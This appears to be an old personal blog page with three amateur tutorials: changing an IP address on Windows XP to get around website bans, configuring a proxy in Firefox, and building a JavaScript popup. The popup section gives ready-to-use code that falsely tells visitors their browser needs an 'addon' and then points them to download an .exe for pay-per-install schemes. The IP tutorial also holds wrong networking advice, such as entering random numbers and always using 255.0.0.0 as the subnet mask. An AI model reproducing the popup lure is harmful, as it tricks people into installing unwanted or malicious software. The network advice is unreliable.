Tuesday, November 25, 2008

How To Change Your Ip Address Trough Windows XP

In this tutorial i am going to show you how to change your ip address trough your windows xp operating system, i'm not sure if this can be done trough vista, but most probably it can.This method of changing your ip address is very fast and simple, and can be used for multiple reasons, for example if you get banned from a forum or website, you can easily change your ip address using this method and get back on the website or forum, this can be used on various things that log your ip address to remove most of your privaleges be creative and use it for the many ways that are available on the ineternet.( I am not responsible for anywa illegal way you use this this is just and informative tutorial.)


Step 1

Click on the start button on the bottom left of your screen.


Step 2

Navigate your cursor over the 'Run' button and click on it.



Step 3

In the space provided type the following line, 'ipconfig /release' and hit the 'OK' button.Your internet connection will now be cut, dont worry its part of the procedure.



Step 4

Now click start again on the bottom left of your screen.


Step 5

Navigate the cursor to the 'Control Panel' button and click on it.



Step 6

Navigate the cursor to the 'Network Connections' icon and double click it to open.



Step 7

Double click on your 'Network Connection' icon with the yellow exclamation mark on it (!).



Step 8

Click on the 'Properties' button under the 'General' tab to open it.



Step 9

Navigate the scroll bar down and highlite the 'Internet Protocol (TCP/IP)' writing by click once on it.


Step 10

Click on the 'Properties' button to open it.



Step 11

Click on the 'Use the following ip address' option.


Step 12

Put in a bunch of random numbers under 'Ip Address' and 'Default Gateway', 'Subnet Mask' Will usually generate itself, but it should allways be 255.0.0.0


Step 13

Click on the 'OK' button.



Step 14

Click on the close button and repeat Step 8, 9 and 10 again.



Step 15

Mark the 'Obtain an ip address automatically' option.


Step 16

Mark the 'Obtain DNS server address automatically' option.


Step 17

Click on the 'OK' button and then click on the 'Close' button on the following window.



Congratulations you have just changed your ip address that is saved on your pc, you can now enter websites you where banned from or use it for your own advantage, if you came across any problems withing this tutorial please comment on this page and i will try and help you. Thank you for reading.

How To Set Up A Proxy On Firefox

Proxies are used by many internet users to keep their identity safe, a proxy is there to hide your ip address and display a different one for you (Not your original one). This way you can surf the internet anonymously with no hassle of beeing tracked back to your original ip address given to you by your internet service providor.Follow the next few steps to learn how to set up a proxy on your firefox web browser.


Step 1

Click on the tools button on the top left of the firefox browser screen.



Step 2

Click on the options button that drops down on the menu.



Step 3

Click on the 'Advanced' button.


Step 4

Click on the 'Network' tab.


Step 5

And finally click on the 'Settings' button.



Step 6

Click on the 'Manual Proxy Configuration' option and input your proxy and port in the space given to you below.


Step 7

Finally click the 'OK' button.Congratulations you have set up a proxy on your firefox browser.Visit www.myip.dk to see if it works.



Visit these website to get some proxy lists and test the proxies speed.


www.aliveproxy.com

Checks if proxy is alive and tells you its speed.


www.samair.ru

Free proxy list.

How to make one of those annoying javascript popups that promote PPI (Pay Per Install) programs.

First you need to create and html page.Start out with,



<html>

<body>

Your Code Will Come Here

</body>

</html>


<a href="javascript: if (confirm('Browser requires addon to view this website, click continue to download addon.')){
( This will be the message that pops up on the dialog bog)


window.location.href='www.yourlinktodownload.com/something.exe' }
( This is the location the script will point to when you click the OK button. So put your link of where you want the page to be directed or what you want downloaded.)


else { void('')
( This will close the popup if the user clicks cancle.)


};">Text to be viewed on Webpage</a>

Text that you want written on your webpage.


So your code should be looking like this...



<html>
<body>
<a href="javascript: if (confirm('Browser requires addon to view this website, click continue to download addon.')) { window.location.href='www.yourlinktodownload.com/something.exe' } else { void('') };">Text to be viewed on Webpage</a>
</body>
</html>


Click Here To See The Script In Action